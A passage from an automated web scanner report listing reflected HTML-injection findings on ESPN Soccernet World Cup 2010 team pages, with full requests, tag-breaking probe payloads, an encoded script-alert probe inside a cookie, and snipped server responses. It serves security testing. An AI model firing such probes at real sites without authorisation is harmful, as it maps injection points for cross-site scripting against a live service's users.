Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:15:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:15:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 06 Nov 2010 23:20:08 GMT
Content-Length: 81695
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ivory Coast Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=4789&_slug_=ivory-coasta81a1"><a>b81a40a8bd9&topId=802166&linktext=Eriksson+hails+Ivory+Coast+players">
...[SNIP]...

5.98. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/4789/ivory-coast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ff8"><a>ef29493db25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/4789/ivory-coast?44ff8"><a>ef29493db25=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:11:09 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:11:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:16:08 GMT
Content-Length: 81803
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ivory Coast Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=4789&44ff8"><a>ef29493db25=1&_slug_=ivory-coast&44ff8">
...[SNIP]...

5.99. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/479/denmark

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b84"><a>1e9fca54d00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/479/denmark46b84"><a>1e9fca54d00 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:13:48 GMT
Content-Length: 82130
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Denmark Football /
...[SNIP]...
<a href="/worldcup2010/team?team=479&_slug_=denmark46b84"><a>1e9fca54d00&topId=801786&linktext=Denmark+coach+devastated+by+defeat">
...[SNIP]...

5.100. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/479/denmark

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92395"><a>78611054bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/479/denmark?92395"><a>78611054bea=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:53 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Sat, 06 Nov 2010 23:12:53 GMT
Content-Length: 82238
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Denmark Football /
...[SNIP]...
<a href="/worldcup2010/team?team=479&92395"><a>78611054bea=1&_slug_=denmark&92395">
...[SNIP]...

5.101. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/481/germany

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95388"><a>7a7e4d9961e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/481/germany95388"><a>7a7e4d9961e HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN04
Cache-Expires: Sat, 06 Nov 2010 23:14:42 GMT
Content-Length: 80545
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Germany Football /
...[SNIP]...
<a href="/worldcup2010/team?team=481&_slug_=germany95388"><a>7a7e4d9961e&topId=807747&linktext=Germany+finish+in+third+place">
...[SNIP]...

5.102. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/481/germany

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6197"><a>19cb7e46d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/481/germany?c6197"><a>19cb7e46d2e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:44 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:13:43 GMT
Content-Length: 80653
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Germany Football /
...[SNIP]...
<a href="/worldcup2010/team?team=481&c6197"><a>19cb7e46d2e=1&_slug_=germany&c6197">
...[SNIP]...

5.103. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/482/portugal

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efcc"><a>d926d468a72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/482/portugal1efcc"><a>d926d468a72 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:53 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:31:53 GMT
Content-Length: 81605
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Portugal Football /
...[SNIP]...
<a href="/worldcup2010/team?team=482&_slug_=portugal1efcc"><a>d926d468a72&topId=804233&linktext=Portugal+depart+after+Spain+defeat">
...[SNIP]...

5.104. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/482/portugal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9668"><a>dbe5bd058c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/482/portugal?c9668"><a>dbe5bd058c5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:23:26 GMT
Content-Type: text/html; charset=iso-8859-1
